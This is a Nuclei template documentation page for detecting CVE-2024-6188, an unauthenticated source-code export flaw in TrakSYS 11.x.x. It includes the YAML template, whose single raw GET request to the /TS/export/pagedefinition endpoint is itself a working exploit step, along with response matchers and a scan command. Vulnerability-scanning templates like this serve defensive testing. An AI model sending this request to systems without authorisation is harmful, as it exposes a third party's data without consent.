Skip to content
Nuclei Templates

TrakSYS 11.x.x - Sensitive Data Exposure

ID: CVE-2024-6188

Severity: medium

Author: s4e-io

Tags: cve,cve2024,traksys,idor,info-leak

Description

Section titled “Description”

A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6188


info:
  name: TrakSYS 11.x.x - Sensitive Data Exposure
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
  impact: An attacker is able to export the source code of the pages without having any credentials to access the application.
  reference:
    - https://kiwiyumi.com/post/tracksys-export-source-code/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6188
    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188
    - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188
  metadata:
    verified: true
    max-request: 1
    vendor: parsec-automation
    product: tracksys
  tags: cve,cve2024,traksys,idor,info-leak


http:
  - raw:
      - |
        GET /TS/export/pagedefinition?ID=1 HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "TrakSYS Version"
          - "Name"
          - "Altname"
        condition: and


      - type: word
        part: content_type
        words:
          - "text/plain"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502206b742039db7a698c05981f1a32147f5d33100e645811fd990bb81ccb00f4db540221009c2fa90a6fe3595d32f15c4b96a4102881410c9cd824f2549786a1a2cfbba8b7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6188.yaml"

View on Github